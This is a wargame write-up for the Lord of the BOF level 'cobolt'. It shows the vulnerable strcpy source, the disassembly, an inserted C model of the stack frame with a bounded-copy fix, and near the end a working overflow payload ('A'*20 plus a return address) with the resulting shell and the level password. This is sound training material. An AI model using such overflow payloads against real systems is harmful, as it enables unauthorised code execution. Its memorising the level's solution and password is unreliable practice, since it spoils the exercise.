[LOB] gremlin -> cobolt
2019. 7. 28. 22:22 · Wargame & CTF/LOB
```c
/*
    The Lord of the BOF : The Fellowship of the BOF
    - cobolt
    - small buffer
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }

    /* unbounded copy: argv[1] longer than 16 bytes overwrites SFP and RET */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
```
The buffer is smaller than it was in gate.
```
0x8048430 <main>:       push   %ebp
0x8048431 <main+1>:     mov    %ebp,%esp
0x8048433 <main+3>:     sub    %esp,16
0x8048436 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:    jg     0x8048453 <main+35>
0x804843c <main+12>:    push   0x80484d0
0x8048441 <main+17>:    call   0x8048350 <printf>
0x8048446 <main+22>:    add    %esp,4
0x8048449 <main+25>:    push   0
0x804844b <main+27>:    call   0x8048360 <exit>
0x8048450 <main+32>:    add    %esp,4
0x8048453 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:    add    %eax,4
0x8048459 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:    push   %edx
0x804845c <main+44>:    lea    %eax,[%ebp-16]      // buffer
0x804845f <main+47>:    push   %eax
0x8048460 <main+48>:    call   0x8048370 <strcpy>
0x8048465 <main+53>:    add    %esp,8
0x8048468 <main+56>:    lea    %eax,[%ebp-16]
0x804846b <main+59>:    push   %eax
0x804846c <main+60>:    push   0x80484dc
0x8048471 <main+65>:    call   0x8048350 <printf>
0x8048476 <main+70>:    add    %esp,8
0x8048479 <main+73>:    leave
0x804847a <main+74>:    ret
```
Since the frame is laid out as [BUFFER(16)][SFP(4)][RET(4)], a payload of "A"*20 + &SHELL should be enough to get a shell.
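As an added example (not LOB's source or this writeup's own code), the C below models the [BUFFER(16)][SFP(4)][RET(4)] layout above as a struct and contrasts cobolt's unbounded strcpy with a length-checked copy that can never reach SFP or RET. The saved-EBP and return-address values, the 24-byte payload and the `0xdeadbeef` marker are all constructed for illustration.

```c
/* Added example: models the cobolt frame layout and a bounded-copy fix.
 * Not part of LOB; all addresses and payload bytes are constructed. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUFSZ 16

/* Model of main()'s frame, lowest address first: buffer, saved EBP, return
 * address. The real frame is laid out the same way per the disassembly
 * (buffer at [%ebp-16]); a compiler may add padding in other programs. */
struct frame {
    char buffer[BUFSZ];
    uint32_t sfp;   /* saved frame pointer, constructed value in callers */
    uint32_t ret;   /* return address, constructed value in callers */
};

/* Unbounded copy as cobolt performs it: bytes past the 16-byte buffer land in
 * sfp and then ret. Written as one memcpy over the whole struct so the model
 * stays well-defined C; the length is clamped to the frame size. */
static void unbounded_copy(struct frame *f, const char *src, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;
    memcpy(f, src, len);
}

/* Hardened copy: rejects any argument that does not fit with its NUL.
 * Returns 1 if copied, 0 if rejected (buffer, sfp and ret untouched). */
static int bounded_copy(struct frame *f, const char *src)
{
    size_t n = strlen(src);
    if (n >= BUFSZ)
        return 0;
    memcpy(f->buffer, src, n + 1);
    return 1;
}

/* Feeds the writeup's shape of payload (20 filler bytes + 4-byte address)
 * through the unbounded copy and returns what ended up in ret. The marker
 * is copied in host byte order, i.e. little-endian on x86 as in the writeup. */
uint32_t ret_after_unbounded(void)
{
    struct frame f = { "", 0xbffffa00u, 0x400008a0u };  /* constructed */
    uint32_t marker = 0xdeadbeefu;                       /* constructed */
    char payload[24];

    memset(payload, 'A', 20);
    memcpy(payload + 20, &marker, sizeof marker);
    unbounded_copy(&f, payload, sizeof payload);
    return f.ret;                                        /* 0xdeadbeef */
}

/* 1 if a 24-byte argument is rejected and sfp/ret keep their values. */
int bounded_rejects_overlong(void)
{
    struct frame f = { "", 0xbffffa00u, 0x400008a0u };  /* constructed */
    const char *input = "AAAAAAAAAAAAAAAAAAAAXXXX";      /* 24 chars, constructed */
    int copied = bounded_copy(&f, input);
    return !copied && f.sfp == 0xbffffa00u && f.ret == 0x400008a0u;
}

/* 1 if the longest fitting argument (15 chars + NUL) is copied intact. */
int bounded_accepts_fitting(void)
{
    struct frame f = { "", 0xbffffa00u, 0x400008a0u };  /* constructed */
    const char *input = "123456789012345";              /* 15 chars, constructed */
    int copied = bounded_copy(&f, input);
    return copied && strcmp(f.buffer, input) == 0 && f.ret == 0x400008a0u;
}

int main(void)
{
    printf("ret after unbounded copy : 0x%08x\n", ret_after_unbounded());
    printf("bounded rejects 24 bytes : %d\n", bounded_rejects_overlong());
    printf("bounded accepts 15 bytes : %d\n", bounded_accepts_fitting());
    return 0;
}
```

The frame model makes the offset arithmetic in the writeup concrete: bytes 16..19 of the argument become the saved EBP and bytes 20..23 become the return address, which is exactly why the padding is 20 bytes. The bounded copy is the minimal fix for cobolt's main(): checking `strlen(argv[1])` against the buffer size before copying (or using a length-limited copy and explicit NUL termination) means no argument, however long, can write past `buffer`.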
As in gate, I used an eggshell.
```
[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "A"*20+"\xa7\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAA§
bash$ my-pass
euid = 502
hacking exposed
```
cobolt : hacking exposed